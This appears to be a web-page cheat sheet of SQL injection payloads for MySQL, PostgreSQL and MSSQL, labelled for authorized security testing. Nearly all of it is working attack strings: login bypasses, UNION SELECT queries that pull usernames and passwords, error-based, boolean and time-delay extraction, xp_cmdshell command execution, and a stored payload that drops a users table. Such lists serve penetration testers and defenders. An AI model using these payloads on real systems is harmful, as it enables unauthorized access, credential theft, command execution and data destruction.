Database exploitation techniques for authorized security testing
Classic SQL injection authentication bypass techniques
MySQLPostgreSQLMSSQLadmin' OR '1'='1
admin' OR 1=1--
admin' OR '1'='1'--
' OR 1=1--
') OR ('1'='1
Data exfiltration via UNION SELECT statements
MySQLPostgreSQL' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3,4,5--
' UNION SELECT username,password FROM users--
' UNION SELECT table_name,NULL FROM information_schema.tables--
Extract data through database error messages
MySQL' AND extractvalue(1,concat(0x7e,version()))--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--
True/False response differentiation for data extraction
' AND 1=1--
' AND 1=2--
' AND (SELECT LENGTH(database()))>5--
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
Delay-based data exfiltration techniques
MySQL' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF((SELECT LENGTH(database()))>5,SLEEP(5),0)--
PostgreSQL-specific exploitation payloads
PostgreSQL' OR '1'='1'--
'; SELECT pg_sleep(5)--
' UNION SELECT NULL,version(),NULL--
' UNION SELECT table_name,NULL FROM information_schema.tables--
Microsoft SQL Server exploitation techniques
MSSQL' OR 1=1--
'; WAITFOR DELAY '00:00:05'--
' UNION SELECT NULL,@@version,NULL--
'; EXEC xp_cmdshell 'whoami'--
Delayed execution payloads stored and executed later
admin' OR '1'='1
test','test'); DROP TABLE users--